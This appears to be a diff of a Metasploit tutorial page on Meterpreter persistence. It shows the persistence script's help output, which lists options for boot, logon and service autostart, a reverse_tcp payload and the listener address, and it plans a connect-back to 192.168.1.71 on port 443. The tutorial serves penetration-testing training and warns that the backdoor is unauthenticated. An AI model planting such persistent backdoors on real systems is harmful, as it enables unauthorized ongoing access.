Understanding the Metasploit Meterpreter

-After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into the system later.
-This way, if the service you exploited is down or patched, you can still gain access to the system.
+After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into the system for later use.
+This way, if the service you initially exploited is down or patched, you can still gain access to the system.
 Metasploit has a Meterpreter script, persistence.rb, that will create a Meterpreter service that will be available to you even if the remote system is rebooted.

 One word of warning here before we go any further.
 The persistent Meterpreter as shown here requires no authentication.
 This means that anyone that gains access to the port could access your back door!
 This is not a good thing if you are conducting a penetration test, as this could be a significant risk.
 In a real world situation, be sure to exercise the utmost caution and be sure to clean up after yourself when the engagement is done.

-Once we’ve initially exploited the host, we run the persistence script with the ‘-h’ switch to see which options are available:
+Once we’ve initially exploited the host, we run persistence with the -h switch to see which options are available:

-meterpreter > run persistence -h OPTIONS: -A Automatically start a matching multi/handler to connect to the agent -U Automatically start the agent when the User logs on -X Automatically start the agent when the system boots -h This help menu -i The interval in seconds between each connection attempt -p The port on the remote host where Metasploit is listening -r The IP of the system running Metasploit listening for the connect back
+meterpreter > run persistence -h [!]
+Meterpreter scripts are deprecated.
+Try post/windows/manage/persistence_exe. [!]
+Example: run post/windows/manage/persistence_exe OPTION=value [...]
+Meterpreter Script for creating a persistent backdoor on a target host.
+OPTIONS: -A Automatically start a matching exploit/multi/handler to connect to the agent -L Location in target host to write payload to, if none %TEMP% will be used. -P Payload to use, default is windows/meterpreter/reverse_tcp. -S Automatically start the agent on boot as a service (with SYSTEM privileges) -T Alternate executable template to use -U Automatically start the agent when the User logs on -X Automatically start the agent when the system boots -h This help menu -i The interval in seconds between each connection attempt -p The port on which the system running Metasploit is listening -r The IP of the system running Metasploit listening for the connect back

 We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and try to connect back to our listener every 5 seconds at IP address 192.168.1.71 on port 443.